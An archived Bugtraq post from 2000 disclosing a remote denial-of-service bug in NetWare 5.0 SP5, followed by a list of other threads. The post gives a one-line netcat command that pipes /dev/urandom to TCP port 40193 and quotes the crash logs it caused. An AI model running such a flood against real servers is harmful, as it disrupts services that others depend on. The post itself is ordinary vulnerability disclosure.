Bugtraq mailing list archives
Remote Denial Of Service -- NetWare 5.0 with SP 5
From: dparussalla () BAYSIDEGRP COM AU (Dimuthu Parussalla)
Date: Tue, 11 Jul 2000 07:26:56 +1000
Remote Denial Of Service -- NetWare 5.0 with SP 5 -------------------------------------------------------------- I encounter a buffer overflow bug in NetWare 5.0 with service pack 5. After few minutes after the attack server issue a memory allocation error. 10-07-2000 12:29:53 pm: SERVER-5.0-4631 [nmID=1001C] WARNING! Server XXXXX experienced a critical error. The offending process was suspended or recovered. However, services hosted by this server may have been affected. I continued the attack another 1/h hr or so. then server issued a Abend error and hangs. 10-07-2000 12:29:53 pm: SERVER-5.0-4631 [nmID=1001C] WARNING! Server XXXXX experienced a critical error. The offending process was suspended or recovered. However, services hosted by this server may have been affected. ATTACK INFO ----------------- Using a linux server connected to the same network. I did the following [root@tik /root]# cat /dev/urandom |nc 192.168.1.15 40193 NetWare TCP port 40193 doesn't handle frag TCP packets as well. using isic I got the same results FIX ----- No FIX yet
Current thread:
- Microsoft Security Bulletin (MS00-048) Microsoft Product Security (Jul 07)
- Re: Microsoft Security Bulletin (MS00-048) Jenik (Jul 08)
- LPRng lpd should not be SETUID root Patrick Powell (Jul 09)
- NetBSD Security Advisory 2000-009 security-officer () NETBSD ORG (Jul 10)
- Re: LPRng lpd should not be SETUID root Cy Schubert - ITSD Open Systems Group (Jul 10)
- NetBSD Security Advisory 2000-010 security-officer () NETBSD ORG (Jul 10)
- <Possible follow-ups>
- Re: Microsoft Security Bulletin (MS00-048) Richard Waymire (Jul 10)
- Re: Microsoft Security Bulletin (MS00-048) Mikael Olsson (Jul 11)
- FreeBSD Ports Security Advisory: FreeBSD-SA-00:29.wu-ftpd [REVISED] FreeBSD Security Advisories (Jul 11)
- Re: Microsoft Security Bulletin (MS00-048) Richard Waymire (Jul 11)
- Remote Denial Of Service -- NetWare 5.0 with SP 5 Dimuthu Parussalla (Jul 10)
- Re: Remote Denial Of Service -- NetWare 5.0 with SP 5 Conrad Wood (Jul 13)
- Re: Microsoft Security Bulletin (MS00-048) Mikael Olsson (Jul 11)
- Remote Denial Of Service -- NetWare 5.0 with SP 5 Dimuthu Parussalla (Jul 10)